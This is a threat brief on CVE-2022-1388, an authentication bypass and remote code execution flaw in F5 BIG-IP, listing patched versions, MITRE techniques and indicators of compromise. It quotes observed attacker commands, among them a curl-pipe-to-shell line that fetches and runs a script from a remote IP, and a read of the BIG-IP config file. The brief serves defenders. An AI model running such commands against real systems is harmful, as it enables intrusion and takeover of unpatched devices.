Threat Research

Threat Brief: CVE-2022-1388

Securonix

On May 4, 2022, F5 released a security advisory for a remote code execution vulnerability in the iControlREST component of its BIG-IP product tracked as CVE-2022-1388. Threat actors can bypass authentication and run arbitrary code on unpatched systems, with mass scanning and in-the-wild exploitation beginning after the advisory. #CVE-2022-1388 #BIG-IP #iControlREST #F5 #ThreatPrevention

Keypoints

  • The vulnerability CVE-2022-1388 affects BIG-IP’s iControl REST and allows authentication bypass with remote code execution.
  • F5 issued an advisory on May 4, 2022, highlighting the critical severity (CVSS 9.8) of the flaw.
  • Threat prevention signatures by Palo Alto Networks detected rapid exploitation attempts (2,552 triggers within 10 hours).
  • Observed exploitation includes commands such as id, cat /config/bigip.conf, and curl/wget to fetch and execute scripts.
  • Mitigations include upgrading BIG-IP to patched versions (e.g., 17.0.0, 16.1.2.2, 15.1.5.1, 14.1.4.6, 13.1.5) or applying workaround guidance.
  • Indicators of Compromise include payload SHA256 hashes, source IPs, and hosting URLs used in exploits.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Exploit CVE-2022-1388 to bypass authentication and run arbitrary code on unpatched systems. Quote: β€˜Threat actors can exploit this vulnerability to bypass authentication and run arbitrary code on unpatched systems.’
  • [T1059.004] Unix Shell – Commands observed during exploitation include id, cat /config/bigip.conf, curl -o- -L hxxp://20.239.193[.]47/kele.sh| sh, etc. Quote: β€˜Table 1 shows the commands that would be executed in the event of successful exploitation.’

Indicators of Compromise

  • [Payload SHA256] – payloads associated with exploitation – 30f7e1998d162dfad69d6d8abb763ae4033bbd4a015d170b1ad3e20d39cd4e20, da647646cd36a3acb716b4266e9032f9c1caf555b7667e1dbe5bef89e7d2fdbb, and 5 more hashes
  • [Source IPv4] – IPs observed in activity – 20.187.67[.]224, 192.132.218[.]149, and 2 more IPs
  • [Hosting URLs] – commands and payload delivery endpoints – hxxps://transfer[.]sh/dlxo3I/1.sh, hxxp://20.239.193[.]47/kele.sh, and 2 more URLs

Read more: https://unit42.paloaltonetworks.com/cve-2022-1388/